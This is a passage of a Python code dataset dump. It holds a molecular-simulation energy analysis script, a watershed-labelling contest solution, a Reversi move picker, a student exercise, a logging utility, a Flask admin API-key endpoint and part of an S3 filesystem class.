mean_energies_met[i] = mean_energy_met\n \n# calculate average and standard deviation/error of cumulative\n# average energies\nenergy_cumul_diff_met = 0\nmean_cumul_energy_met = 0\nstand_dev_met = 0\nmean_cumul_energy_met = np.sum(energies_cumul_ave_met[0:RDF_ideal+1], \n axis = 0)/(RDF_number)\nfor i in range(0,RDF_ideal):\n energy_cumul_diff_met += (energies_cumul_ave_met[i] - \n mean_cumul_energy_met)**2\nstand_dev_met = np.sqrt(energy_cumul_diff_met/(RDF_ideal-1))\nstand_error_met = stand_dev_met/(np.sqrt(RDF_ideal))\n\n\"\"\"Read the file with the Metropolis Kob-Anderson LJ Binary \nMixture Data using the PEL sampling method.\"\"\"\nf = open('Nonbias_PEL_50000_MC_Uniform_delta_0.1_T_1_.out', 'r')\n\n# read in the contents\ncontents = f.readlines()\n\n# baseline sigma value\nsigma = contents[1]\nsigma = float(sigma)\n\n# sigma_aa value (distance between a-a spheres)\nsigma_aa = contents[3]\nsigma_aa = float(sigma_aa)\n\n# sigma_bb value (distance between b-b spheres)\nsigma_bb = contents[5]\nsigma_bb = float(sigma_bb)\n\n# sigma_ab value (distance between a-b spheres)\nsigma_ab = contents[7]\nsigma_ab = float(sigma_ab)\n\n# read in the energy-equivalent temperature of system\nT = contents[9]\nT = float(T)\n\n# read in baseline energy constant epsilon\nepsilon = contents[11]\nepsilon = float(epsilon)\n\n# epsilon_aa (energy constant between a-a spheres)\nepsilon_aa = contents[13]\nepsilon_aa = float(epsilon_aa)\n\n# epsilon_bb (energy constant between b-b spheres)\nepsilon_bb = contents[15]\nepsilon_bb = float(epsilon_bb)\n\n# epsilon_ab (energy constant between a-b spheres)\nepsilon_ab = contents[17]\nepsilon_ab = float(epsilon_ab)\n\n# reduced density parameter of system, rho\nrho = contents[19]\nrho = float(rho)\nrho = round(rho, 3)\n\n# total number of spheres\nn_total = contents[21]\nn_total = int(n_total)\n\n# fraction of a-type spheres (should be about 80%)\nx_a = contents[23]\nx_a = float(x_a)\n\n# fraction of b-type spheres (should be about 20%)\nx_b = contents[25]\nx_b = float(x_b)\nx_b = round(x_b, 2)\n\n# packing fraction phi\nphi = contents[27]\nphi = float(phi)\n\n\"\"\"Parameter used in the more complete version of the PEL model.\nFor the baseline PEL sampling scheme, this is always 0.5\"\"\"\na = contents[29]\na = float(a)\n\n\"\"\"If the Gaussian distribution is used as the basis of the Monte\nCarlo simulation, then this parameter is used. This parameter\nis equal to 1/(2*variance). This parameter can be ignored when\nthe uniform distribution is employed.\"\"\"\nalpha = contents[31]\nalpha = float(alpha)\n\n# total number of MC steps taken in the simulation\nMC_steps = contents[33]\nMC_steps = int(MC_steps)\n\n\"\"\"Total number of RDF values averaged at the end w/out \nrelaxation time (i.e. for 50,000 MC steps and skipping\naverages for 10 MC steps, the number of RDFs averaged will\nbe 5,000 for the final averaged RDF.)\"\"\"\nRDF_ideal = contents[35]\nRDF_ideal = int(RDF_ideal)\n\n# relazation time if one is given before-hand (this is usually 0)\nt_relax = contents[37]\nt_relax = int(t_relax)\n\n# length and volume of box\nbox_length = 10\nV = box_length**3\n\n# define this value to simplify reading lines\nskip = RDF_ideal\n\n\"\"\"Read in spheres list (this labels the particles with sphere\ntypes a and b, where a value of 1 represents an a-type and a\nvalue of 0 represents a b-type).\"\"\" \nspheres = []\nsphere_list = contents[3*n_total+42:4*n_total+42]\n\nfor line in sphere_list:\n\tspheres.append(int(line))\n\n\"\"\"Define matrices which will store all x, y, and z coordinates\nper time slice as row vectors. This runs through the total\nnumber of time slices up to RDF_ideal.\"\"\"\nxs_new = np.zeros((RDF_ideal,n_total))\nys_new = np.zeros((RDF_ideal,n_total))\nzs_new = np.zeros((RDF_ideal,n_total))\n\n# read in all x, y, and z coordinates stored as row vectors in\n# the matrices above\nfor i in range(0,RDF_ideal):\n\txs_new[i] = contents[(4+3*i)*n_total+(47+3*i):(5+3*i)*n_total+(47+3*i)]\n\tys_new[i] = contents[(5+3*i)*n_total+(48+3*i):(6+3*i)*n_total+(48+3*i)]\n\tzs_new[i] = contents[(6+3*i)*n_total+(49+3*i):(7+3*i)*n_total+(49+3*i)]\n\n# moves accepted\naccept_statement = contents[(7+3*skip)*n_total+(49+3*skip)]\naccept = contents[(7+3*skip)*n_total+(50+3*skip)]\naccept = int(accept)\n\n# moves rejected\nreject_statement = contents[(7+3*skip)*n_total+(51+3*skip)]\nreject = contents[(7+3*skip)*n_total+(52+3*skip)]\nreject = int(reject)\n\n# Acceptance percentage\nper_accept_statement = contents[(7+3*skip)*n_total+(53+3*skip)]\nper_accept = contents[(7+3*skip)*n_total+(54+3*skip)]\nper_accept = float(per_accept)\nper_accept = np.round(per_accept, 1)\nper_accept_PEL = per_accept\n\n# Exact RDF numbers (if the RDF_number = RDF_ideal, then the\n# difference is zero)\nRDF_statement = contents[(7+3*skip)*n_total+(55+3*skip)]\nRDF_number = contents[(7+3*skip)*n_total+(56+3*skip)]\nRDF_number = int(RDF_number)\nRDF_difference = RDF_ideal - RDF_number\n\n# number of bins used in the RDF histogram (usually 300)\nNbins_statement = contents[(7+3*skip)*n_total+(57+3*skip)]\nNbins = contents[(7+3*skip)*n_total+(58+3*skip)]\nNbins = int(Nbins)\n\nf.close()\n\n# define energies and set counting to 0\nenergies = []\nNgr = 0\n\n# Calculate constants to be used in potentials and forces\nepsilon_aa_4 = 4*epsilon_aa\nepsilon_bb_4 = 4*epsilon_bb\nepsilon_ab_4 = 4*epsilon_ab\nepsilon_aa_24 = 24*epsilon_aa\nepsilon_bb_24 = 24*epsilon_bb\nepsilon_ab_24 = 24*epsilon_ab\nsigma_aa_6 = sigma_aa**6\nsigma_bb_6 = sigma_bb**6\nsigma_ab_6 = sigma_ab**6\nsigma_aa_12 = sigma_aa**12\nsigma_bb_12 = sigma_bb**12\nsigma_ab_12 = sigma_ab**12\nsigma_aa_2_12 = 2*sigma_aa_12\nsigma_bb_2_12 = 2*sigma_bb_12\nsigma_ab_2_12 = 2*sigma_ab_12\nV_aa_max = epsilon_aa_4*((2/5)**12 - (2/5)**6)\nV_bb_max = epsilon_bb_4*((2/5)**12 - (2/5)**6)\nV_ab_max = epsilon_ab_4*((2/5)**12 - (2/5)**6)\n\n# Calculate energies based on all sphere-type interactions. \n# Append total energies to energies list.\nfor i in range(0,RDF_ideal):\n # if i%skip == 0: # relaxation time\n Ngr += 1 # count the RDF calculation number\n print(Ngr)\n V_LJ_total = 0\n for j in range(0,n_total-1):\n for k in range(j+1,n_total):\n if spheres[j] == spheres[k]:\n # calculate RDF for type A-A spheres\n if spheres[j] == 0:\n xr_aa_now = xs_new[i,j] - xs_new[i,k] \n yr_aa_now = ys_new[i,j] - ys_new[i,k]\n zr_aa_now = zs_new[i,j] - zs_new[i,k]\n xr_aa_now = xr_aa_now - box_length*np.round(xr_aa_now/box_length)\n yr_aa_now = yr_aa_now - box_length*np.round(yr_aa_now/box_length)\n zr_aa_now = zr_aa_now - box_length*np.round(zr_aa_now/box_length)\n r_aa_now = np.sqrt(xr_aa_now**2 + yr_aa_now**2 + zr_aa_now**2)\n r_aa_now_6 = r_aa_now**6\n r_aa_now_12 = r_aa_now**12\n # Calculate energies\n if r_aa_now > 2.5*sigma_aa:\n V_LJ_now = 0\n else:\n V_LJ_now = epsilon_aa_4*((sigma_aa_12/r_aa_now_12) - \n (sigma_aa_6/r_aa_now_6)) - V_aa_max\n V_LJ_total += V_LJ_now\n \n # calculate RDF for type B-B spheres\n elif spheres[j] == 1:\n xr_bb_now = xs_new[i,j] - xs_new[i,k] \n yr_bb_now = ys_new[i,j] - ys_new[i,k]\n zr_bb_now = zs_new[i,j] - zs_new[i,k]\n xr_bb_now = xr_bb_now - box_length*np.round(xr_bb_now/box_length)\n yr_bb_now = yr_bb_now - box_length*np.round(yr_bb_now/box_length)\n zr_bb_now = zr_bb_now - box_length*np.round(zr_bb_now/box_length)\n r_bb_now = np.sqrt(xr_bb_now**2 + yr_bb_now**2 + zr_bb_now**2)\n r_bb_now_6 = r_bb_now**6\n r_bb_now_12 = r_bb_now**12\n # Calculate energies\n if r_bb_now > 2.5*sigma_bb:\n V_LJ_now = 0\n else:\n V_LJ_now = epsilon_bb_4*((sigma_bb_12/r_bb_now_12) - \n (sigma_bb_6/r_bb_now_6)) - V_bb_max\n V_LJ_total += V_LJ_now\n \n # calculate RDF for type A-B spheres\n elif spheres[j] != spheres[k]:\n xr_ab_now = xs_new[i,j] - xs_new[i,k] \n yr_ab_now = ys_new[i,j] - ys_new[i,k]\n zr_ab_now = zs_new[i,j] - zs_new[i,k]\n xr_ab_now = xr_ab_now - box_length*np.round(xr_ab_now/box_length)\n yr_ab_now = yr_ab_now - box_length*np.round(yr_ab_now/box_length)\n zr_ab_now = zr_ab_now - box_length*np.round(zr_ab_now/box_length)\n r_ab_now = np.sqrt(xr_ab_now**2 + yr_ab_now**2 + zr_ab_now**2)\n r_ab_now_6 = r_ab_now**6\n r_ab_now_12 = r_ab_now**12\n # Calculate energies\n if r_ab_now > 2.5*sigma_ab:\n V_LJ_now = 0\n else:\n V_LJ_now = epsilon_ab_4*((sigma_ab_12/r_ab_now_12) - \n (sigma_ab_6/r_ab_now_6)) - V_ab_max\n V_LJ_total += V_LJ_now\n\n # Append total energies to energies list\n energies.append(V_LJ_total)\n\n# turn total energies into array\nenergies_PEL = np.array(energies)\n\n\"\"\"Calculate average energies and set initial energy to same\ninitial energy as that in the canonical ensemble simulation.\nBoth simulations started at this energy.\"\"\"\nenergies_ave_PEL = energies_PEL/n_total\nenergies_ave_PEL[0] = energies_ave_met[0]\n\n# Calculate cumulative average energies from PEL ensemble\nenergies_cumul_ave_PEL = np.zeros(RDF_ideal)\nfor i in range(RDF_ideal):\n\tenergies_cumul_ave_PEL[i] = np.sum(energies_ave_PEL[:i+1], \n axis = 0)/(i+1)\n\nf = open('Cumulative_Energies_PEL_T_1.out', 'w')\n\nf.write('PEL Ensemble Cumulative Energies at T*=1\\n')\nfor val in energies_cumul_ave_PEL:\n f.write(\"{:}\\n\".format(val))\n\nf.close()\n\n# define the array of MC steps taken in the simulation\niterations_PEL = np.linspace(RDF_difference,RDF_ideal-1,RDF_ideal)\niterations_PEL = np.array(iterations_PEL)\n\n# calculate the average energy of the average energies and \n# the standard deviation of the average energies\ntotal_energy = 0\nenergy_diff = 0\nfor i in range(0,RDF_ideal):\n\ttotal_energy += energies_PEL[i]\nmean_energy_PEL = total_energy/(n_total*RDF_ideal)\nmean_energy_PEL = round(mean_energy_PEL, 3)\nfor i in range(0,RDF_ideal):\n\tenergy_diff += (energies_ave_PEL[i] - mean_energy_PEL)**2\nstand_dev = np.sqrt(energy_diff/((RDF_ideal-1)*RDF_ideal))\nstand_dev = round(stand_dev, 3)\nmean_energies_PEL = np.zeros(RDF_ideal)\nfor i in range(0,RDF_ideal):\n\tmean_energies_PEL[i] = mean_energy_PEL\n\t\n# calculate average and standard deviation/error of cumulative\n# average energies\nenergy_cumul_diff_PEL = 0\nmean_cumul_energy_PEL = 0\nstand_dev_PEL = 0\nmean_cumul_energy_PEL = np.sum(energies_cumul_ave_PEL[0:RDF_ideal+1], \n axis = 0)/(RDF_number)\nfor i in range(0,RDF_ideal):\n\tenergy_cumul_diff_PEL += (energies_cumul_ave_PEL[i] - \n mean_cumul_energy_PEL)**2\nstand_dev_PEL = np.sqrt(energy_cumul_diff_PEL/(RDF_ideal-1))\nstand_error_PEL = stand_dev_PEL/(np.sqrt(RDF_ideal))\n\n# Color scheme using color-blind friendly colors\nCB_color_cycle = ['c', 'm', 'sienna', 'k','y','salmon']\n\n# Ensures correct number of MC steps (this should be 10)\nn_skip = MC_steps/RDF_ideal\n\n# Plot average energies of canonical ensemble simulation\nplt.figure(figsize=(10,5))\nplt.subplot(1,2,1)\nax1 = plt.subplot(1,2,1)\nplt.plot(n_skip*iterations_met[:],energies_ave_met[:],\n c = CB_color_cycle[0], alpha = 0.8)\nplt.plot(n_skip*iterations_met[:],mean_energies_met[:], \n c = CB_color_cycle[1])\nplt.plot(n_skip*iterations_met[:],landscape_energy[:], \n c = 'black')\nplt.legend(('Canonical Ensemble /N','Average Energy: {}'.\n format(mean_energy_met),'Landscape Energy: {}'.\n format(energy_land)), loc = 'lower center')\nplt.xlabel('MC Steps')\nplt.ylabel('Average Potential Energy per Particle')\n\n# Plot average energies of PEL ensemble simulation\nplt.subplot(1,2,2)\nax2 = plt.subplot(1,2,2)\nplt.plot(n_skip*iterations_PEL[:],energies_ave_PEL[:], \n c = CB_color_cycle[0], alpha = 0.8)\nplt.plot(n_skip*iterations_PEL[:],mean_energies_PEL[:], \n c = CB_color_cycle[1])\nplt.plot(n_skip*iterations_PEL[:],landscape_energy[:RDF_number], \n c = 'black')\nplt.legend(('PEL Ensemble /N','Average Energy: {}'.\n format(mean_energy_PEL),'Landscape Energy: {}'.\n format(energy_land)), loc = 'lower center')\nplt.xlabel('MC Steps')\n\n# Plot cumulative average energies\nfig,ax1 = plt.subplots()\nax1.plot(n_skip*iterations_met[:5000],energies_cumul_ave_met[:5000], \n c = CB_color_cycle[0])\nax1.plot(n_skip*iterations_PEL,energies_cumul_ave_PEL, \n c = CB_color_cycle[1], linestyle = 'dashed')\nax1.plot(n_skip*iterations_met[:5000],landscape_energy[:5000], c = 'black')\nax1.legend(('Canonical','PEL','landscape energy: {}'.format(energy_land)),\n loc = 'lower right', prop = {\"size\":12})\nplt.xlabel('MC Steps', fontsize = 15) # (n = {}, step size = {}$\\sigma$)'.format(n_total,np.round(1/np.sqrt(2*alpha)/sigma, 2)), fontsize = 12.5)# t_relax))\nplt.ylabel(r'Cumulative $(\\langle V \\rangle - E_{L})/(N\\epsilon)$', \n fontsize = 15)\nplt.ylim(-6.5,-4.0) # use for T*=2\n# plt.ylim(-6.5,-5.75) # use for T*=1\n# plt.ylim(-6.5,-6.0) # use for T*=0.75\n# plt.ylim(-6.55,-6.0) # use for T*=0.725\n\n# adjust inset position as needed\naxins = zoomed_inset_axes(ax1, zoom = 2.5, bbox_to_anchor=(1050,650))\naxins.plot(n_skip*iterations_met[:5000],energies_cumul_ave_met[:5000], \n c = CB_color_cycle[0]) # plot canonical within inset only for T*=2\naxins.plot(n_skip*iterations_PEL,energies_cumul_ave_PEL, \n c = CB_color_cycle[1], linestyle = 'dashed')\naxins.plot(n_skip*iterations_met[:5000],landscape_energy[:5000], \n c = 'black')\naxins.set_xlim(0,10000)\naxins.set_ylim(-5.0,-4.5) # use for T*=2\n# axins.set_ylim(-6.05,-6.0) # use for T*=1\n# axins.set_ylim(-6.46,-6.42) # use for T*=0.75 \n# axins.set_ylim(-6.49,-6.47) # use for T*=0.725\nmark_inset(ax1, axins, loc1 = 1, loc2 = 3)\n\nplt.show()\n","repo_name":"josephfichera314/PEL-Convergence","sub_path":"Energy Results/Raw_Energies.py","file_name":"Raw_Energies.py","file_ext":"py","file_size_in_byte":19917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23593149681","text":"import sys\n\ndef main(argv):\n ifilename = argv[1]\n ofilename = argv[2]\n ifile = open(ifilename, 'r')\n numlines = ifile.readline()\n ofile = open(ofilename, 'w')\n numlines = numlines.strip();\n num = int(numlines)\n labeler = Labeler()\n \n for i in range(num):\n dimensions = ifile.readline().strip().split(\" \")\n H,W = int(dimensions[0]),int(dimensions[1])\n altitudes = []\n ofile.write(\"Case #\"+str(i+1)+\":\\n\")\n for y in range(H):\n a = ifile.readline().strip().split(\" \")\n b = []\n for x in range(W):\n b.append(int(a[x]))\n altitudes.append(b)\n \n labels = labeler.generateLabels(altitudes, H, W)\n \n for y in range(H):\n for x in range(W):\n ofile.write(labels[y][x]+\" \")\n ofile.write(\"\\n\")\n \n ifile.close()\n ofile.close()\n\nclass Labeler:\n \n sink = -1\n north = 0\n west = 1\n east = 2\n south = 3\n \n directions = []\n labels = []\n alphabet = \"abcdefghijklmnopqrstuvwxyz\"\n \n def generateLabels(self, altitudes, H, W):\n self.directions = [ [self.sink for x in range(W)] for y in range(H) ]\n for y in range(H):\n for x in range(W):\n least = altitudes[y][x]\n direction = self.sink\n if -1 < x < W and -1 < y-1 < H and altitudes[y-1][x] < least:\n least = altitudes[y-1][x]\n self.directions[y][x] = self.north\n if -1 < x-1 < W and -1 < y < H and altitudes[y][x-1] < least:\n least = altitudes[y][x-1]\n self.directions[y][x] = self.west\n if -1 < x+1 < W and -1 < y < H and altitudes[y][x+1] < least:\n least = altitudes[y][x+1]\n self.directions[y][x] = self.east\n if -1 < x < W and -1 < y+1 < H and altitudes[y+1][x] < least:\n self.directions[y][x] = self.south\n \n self.reallyGenerateLabels(H, W)\n return self.labels\n \n def reallyGenerateLabels(self, H, W):\n self.labels = [ [\"\" for x in range(W)] for y in range(H) ]\n #print self.directions\n self.nextlabel = 0\n for y in range(H):\n for x in range(W):\n #print \"===============================\"\n #print self.labels\n self.findLabel(x,y)\n \n def findLabel(self, x, y):\n #print \"(\"+str(y)+\",\"+str(x)+\") - \"\n if self.labels[y][x] != \"\":\n return\n #print \"already set\"\n elif self.directions[y][x] == self.sink:\n self.labels[y][x] = self.alphabet[self.nextlabel]\n #print \"sink \"+self.alphabet[self.nextlabel]\n self.nextlabel += 1\n elif self.directions[y][x] == self.north:\n #print \"going north\"\n if self.labels[y-1][x] == \"\":\n self.findLabel(x,y-1)\n self.labels[y][x] = self.labels[y-1][x]\n elif self.directions[y][x] == self.west:\n #print \"going west\"\n if self.labels[y][x-1] == \"\":\n self.findLabel(x-1,y)\n self.labels[y][x] = self.labels[y][x-1]\n elif self.directions[y][x] == self.east:\n #print \"going east\"\n if self.labels[y][x+1] == \"\":\n self.findLabel(x+1,y)\n self.labels[y][x] = self.labels[y][x+1]\n elif self.directions[y][x] == self.south:\n #print \"going south\"\n if self.labels[y+1][x] == \"\":\n self.findLabel(x,y+1)\n self.labels[y][x] = self.labels[y+1][x]\n\nif __name__ == '__main__':\n main(sys.argv)","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_35/200.py","file_name":"200.py","file_ext":"py","file_size_in_byte":3745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"73118364675","text":"import core\r\nimport copy\r\n\r\ndef get_move(board, player):\r\n return get_move_greedy(board, player)\r\n \r\ndef get_move_greedy(board,player):\r\n # test.print_board(board)\r\n board_copy = copy.deepcopy(board)\r\n valid_moves = core.get_valid_moves(board_copy,player)\r\n if len(valid_moves) == 0:\r\n return \"NO MOVES\"\r\n else:\r\n #iterate on all moves\r\n bestMove = valid_moves[0]\r\n minScore= core.get_score(board)[player]\r\n for move in valid_moves:\r\n board_copy = copy.deepcopy(board)\r\n core.make_move(board_copy,move[0],move[1],player)\r\n #check if move is better\r\n print(\"move is: \",move,\" score is: \",core.get_score(board_copy)[player])\r\n if core.get_score(board_copy)[player] > minScore:\r\n bestMove = move\r\n minScore = core.get_score(board_copy)[player]\r\n print(\"best move is: \",bestMove)\r\n bestMove = convertToTuple(bestMove)\r\n return bestMove\r\n \r\n#convert (2,2) to (c3)\r\ndef convertToTuple(move):\r\n x = chr(move[0]+97)\r\n y = move[1]+1\r\n return x+str(y)\r\n\r\n","repo_name":"Abdur-Rahman-Khan/Reversi-Game","sub_path":"mover.py","file_name":"mover.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"33268920844","text":"\r\n# Recitation Lab 2 Question 3: Program to display assignment score\r\n# Author: Asmit De\r\n# Date: 01/26/2017\r\n\r\nassignment = input('Enter the assignment name: ')\r\ntotalpoints = input('Enter the total points: ')\r\nscore = input('Enter your score: ')\r\n\r\nprint('\\nYou scored', score, 'out of', totalpoints, 'in', assignment)\r\n","repo_name":"asmitde/TA-PSU-CMPSC101","sub_path":"Spring 2017/Recitations/Lab2/Q3.py","file_name":"Q3.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"31692707336","text":"# -*- coding: utf-8 -*-\r\n#until.py 文本块生成器\r\nimport logging\r\nimport logging.config\r\nlogging.config.fileConfig('logging.conf')\r\n\r\n# create logger\r\nroot_logger = logging.getLogger('root')\r\nmain_logger = logging.getLogger('main.util')\r\n\r\n# 'application' code\r\nmain_logger.info(\"你好我们的文本标记项目开始了!\")\r\ndef lines(file):\r\n for line in file:\r\n yield line #收集所遇到的行,\r\n main_logger.debug(\"line : %s\" % line)\r\n yield '\\n' #确保文件的最后一行是空行,否则就不知程序什么时候结束\r\n\r\ndef blocks(file):\r\n block = []\r\n\r\n for line in lines(file):\r\n if line.strip():\r\n block.append(line)\r\n elif block != []:\r\n yield ''.join(block).strip() #把列表连接成字符串\r\n main_logger.debug(\"block is %s \" % block)\r\n block = []\r\n","repo_name":"liulin1840/learn_python","sub_path":"mark/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"24041373557","text":"\"\"\"\n **api keys system admin module**\n controls access to api keys for system admin application\n\"\"\"\n\n__developer__ = \"mobius-crypt\"\n__email__ = \"mobiusndou@gmail.com\"\n__twitter__ = \"@blueitserver\"\n__github_repo__ = \"https://github.com/freelancing-solutions/memberships-and-affiliate-api\"\n__github_profile__ = \"https://github.com/freelancing-solutions/\"\n__licence__ = \"MIT\"\n\nimport hmac\nfrom typing import Optional\nfrom flask import Blueprint, request, current_app\n\nfrom config import config_instance\nfrom config.exceptions import UnAuthenticatedError, error_codes\nfrom security.apps_authenticator import handle_apps_authentication, verify_secret_key\nfrom views import api_keys_view\n\nadmin_api_keys_api_bp = Blueprint(\"admin_api_keys_api\", __name__)\n\n\n@admin_api_keys_api_bp.route('/_api/v1/admin/api-keys/', methods=[\"POST\"])\n@handle_apps_authentication\ndef api_keys(path: str) -> tuple:\n \"\"\"\n **api_keys**\n system admin api keys endpoint\n\n :param path:\n :return: results depending on path\n \"\"\"\n json_data: dict = request.get_json()\n secret_key: Optional[str] = json_data.get('SECRET_KEY')\n verify_secret_key(secret_key)\n\n if path == \"get-all\":\n organization_id = is_admin_user(json_data)\n return api_keys_view.return_all_organization_keys(organization_id=organization_id)\n elif path == \"return-active-org-keys\":\n organization_id = is_admin_user(json_data)\n return api_keys_view.return_active_organization_keys(organization_id=organization_id)\n elif path == \"get-api-key\":\n organization_id = is_admin_user(json_data)\n api_key: str = json_data.get('api_key')\n return api_keys_view.get_api_key(api_key=api_key, organization_id=organization_id)\n\n\ndef is_admin_user(json_data):\n organization_id: str = json_data.get('organization_id')\n uid: str = json_data.get('uid')\n compare_uid: bool = hmac.compare_digest(uid, config_instance.ADMIN_UID)\n compare_org: bool = hmac.compare_digest(organization_id, config_instance.ORGANIZATION_ID)\n if not (compare_org and compare_uid):\n message: str = 'User Not Authorized: you cannot perform this action'\n raise UnAuthenticatedError(status=error_codes.access_forbidden_error_code, description=message)\n return organization_id\n","repo_name":"Memberships-Affiliate-Management-API/membership_and_affiliate_api","sub_path":"_api/admin_api/api/apikeys/apikeys.py","file_name":"apikeys.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"}
+{"seq_id":"15765400324","text":"import functools\nimport io\nimport os\nimport threading\nimport time\nimport logging\n\nfrom .filesystem_interface import FileSystem\nfrom .close_protected_stream import CloseProtectedStream\n\n\ndef retryIfIrrelevantFailure(f):\n @functools.wraps(f)\n def inner(*args, **kwargs):\n slowdownAmount = 0.5\n\n while True:\n try:\n return f(*args, **kwargs)\n except Exception as e:\n if \"An error occurred (SlowDown)\" in str(e):\n pass\n elif \"Could not connect to the endpoint URL\" in str(e):\n pass\n elif \"InternalError\" in str(e):\n pass\n elif \"Connection reset by peer\" in str(e):\n pass\n elif \"Remote end closed connection without response\" in str(e):\n pass\n elif \"reached max retries\" in str(e):\n pass\n elif \"Service Unavailable\" in str(e):\n pass\n else:\n raise\n\n logging.warning(\"Error connecting to s3. Trying again.\")\n time.sleep(slowdownAmount)\n slowdownAmount = min(10, slowdownAmount * 1.5)\n\n return inner\n\n\nclass S3FileSystem(FileSystem):\n def __init__(self, bucketname: str, keyPrefix: str, accessKey=None, secretKey=None):\n super().__init__()\n self._accessKey = accessKey\n self._secretKey = secretKey\n\n self._keyPrefix = \"\"\n self._bucketname = bucketname\n\n self._boto_thread_local = threading.local()\n # check that bucket exists\n if not self.isdir(\"\"):\n raise Exception(f\"S3 Bucket {bucketname} does not exist or cannot be acessed.\")\n\n # check that the keyPrefix is a valid directory in the given bucket\n self._keyPrefix = self.withTrailingSep(keyPrefix)\n if not self.isdir(\"\"):\n raise Exception(f\"S3 prefix {keyPrefix} is not a directory in bucket {bucketname}\")\n\n def __getstate__(self):\n \"\"\"Control how pickle serializes instances.\n\n _boto_thread_local is not serializeable and should be re-initialized\n \"\"\"\n state = self.__dict__.copy()\n\n del state[\"_boto_thread_local\"]\n\n return state\n\n def __setstate__(self, state):\n \"\"\"Control how pickle deserializes instances.\"\"\"\n self.__dict__.update(state)\n self._boto_thread_local = threading.local()\n\n @property\n def keyPrefix(self):\n return self._keyPrefix\n\n @property\n def bucketname(self):\n return self._bucketname\n\n def __eq__(self, other):\n if not isinstance(other, S3FileSystem):\n return False\n if self._bucketname != other._bucketname:\n return False\n if self._keyPrefix != other._keyPrefix:\n return False\n if self._accessKey != other._accessKey:\n return False\n if self._secretKey != other._secretKey:\n return False\n return True\n\n def __hash__(self):\n return hash(\n (\n \"S3FileSystem\",\n self._bucketname,\n self._keyPrefix,\n self._accessKey,\n self._secretKey,\n )\n )\n\n def _pathToKey(self, path):\n \"\"\"Translate FileSystem path to S3 bucket key.\"\"\"\n path = self._stripSeps(path)\n if path == \"\":\n key = self.withTrailingSep(self._keyPrefix)\n else:\n key = self.joinPaths(self._keyPrefix, path)\n\n if not key.startswith(self._keyPrefix):\n raise OSError(f\"Unsafe path detected: '{path}' [not under '{self._keyPrefix}']\")\n\n return key\n\n def _keyToPath(self, key):\n \"\"\"Translate S3 key to FileSystem path.\"\"\"\n if not key.startswith(self._keyPrefix):\n raise OSError(f\"Invalid key: '{key}' [doesn't start with '{self._keyPrefix}'\")\n return key[len(self._keyPrefix) :]\n\n def _makeSessionAndClient(self):\n if not hasattr(self._boto_thread_local, \"client\"):\n self._boto_thread_local.client = {}\n self._boto_thread_local.session = {}\n self._boto_thread_local.bucket = {}\n\n accessKey = self._accessKey\n secretKey = self._secretKey\n\n kwargs = {}\n if accessKey is not None and accessKey != \"\":\n kwargs[\"aws_access_key_id\"] = accessKey\n kwargs[\"aws_secret_access_key\"] = secretKey\n\n # I can't see how to pass this into boto3 direclty because it's so\n # poorly documented. We need this to ensure we can actually download everything.\n os.environ[\"AWS_METADATA_SERVICE_NUM_ATTEMPTS\"] = \"10\"\n os.environ[\"AWS_METADATA_SERVICE_TIMEOUT\"] = \"2\"\n\n import boto3\n\n session = boto3.session.Session(**kwargs)\n self._boto_thread_local.session[accessKey] = session\n self._boto_thread_local.client[accessKey] = session.client(\"s3\")\n\n def _getClient(self):\n if (\n not hasattr(self._boto_thread_local, \"client\")\n or self._accessKey not in self._boto_thread_local.client\n ):\n self._makeSessionAndClient()\n\n return self._boto_thread_local.client[self._accessKey]\n\n def _getSession(self):\n if (\n not hasattr(self._boto_thread_local, \"session\")\n or self._accessKey not in self._boto_thread_local.session\n ):\n self._makeSessionAndClient()\n\n return self._boto_thread_local.session[self._accessKey]\n\n def _getBucket(self):\n key = (self._bucketname, self._accessKey)\n session = self._getSession()\n\n if key not in self._boto_thread_local.bucket:\n self._boto_thread_local.bucket[key] = session.resource(\"s3\").Bucket(\n self._bucketname\n )\n\n return self._boto_thread_local.bucket[key]\n\n def exists(self, path) -> bool:\n return self.isfile(path) or self.isdir(path)\n\n def isdir(self, path) -> bool:\n # In S3 a path can simultaneously be a file and a dir\n path = self._stripSeps(path)\n\n key = self.withTrailingSep(self._pathToKey(path))\n keysWithPrefix = self._listprefix(key)\n # If path is a not a dir, keysWithPrefix will be empty.\n # Unfortunately we cannot take len() without wrapping keysWithPrefix\n # in a list(), which could cause a lot of data transfer, if it hasn't\n # all been fetched yet. But we can use .limit(1) to say we just want\n # one result.\n try:\n length = len(list(keysWithPrefix.limit(1)))\n except Exception:\n return False\n else:\n return True if length > 0 or path == \"\" else False\n\n def _loadIt(self, path):\n key = self._pathToKey(path)\n\n @retryIfIrrelevantFailure\n def loadIt():\n o = self._getBucket().Object(key)\n o.load() # make sure the object exists\n return o\n\n return loadIt()\n\n def isfile(self, path) -> bool:\n # In S3 a path can simultaneously be a file and a dir\n try:\n self._loadIt(path)\n\n except Exception:\n return False\n\n return True\n\n def getmtime(self, path) -> float:\n try:\n o = self._loadIt(path)\n\n except Exception as e:\n logging.exception(\"Failed to load s3 object in getmtime\")\n raise OSError(f\"File not accessible: '{path}'\") from e\n\n return o.last_modified.timestamp()\n\n def getsize(self, path) -> int:\n \"\"\"Return the size in bytes of path.\n\n Raise OSError if the file does not exist or is inaccessible.\n \"\"\"\n try:\n o = self._loadIt(path)\n\n except Exception as e:\n logging.exception(\"Failed to load s3 object in getsize\")\n raise OSError(f\"File not accessible: '{path}'\") from e\n\n return o.content_length\n\n def stat(self, path):\n try:\n o = self._loadIt(path)\n\n except Exception as e:\n logging.exception(\"Failed to load s3 object in stat\")\n raise OSError(f\"File not accessible: '{path}'\") from e\n\n return {\"modtime\": o.last_modified.timestamp(), \"size\": o.content_length}\n\n def _listprefix(self, prefix):\n \"\"\"return a collection of ObjectSummary objects that start with 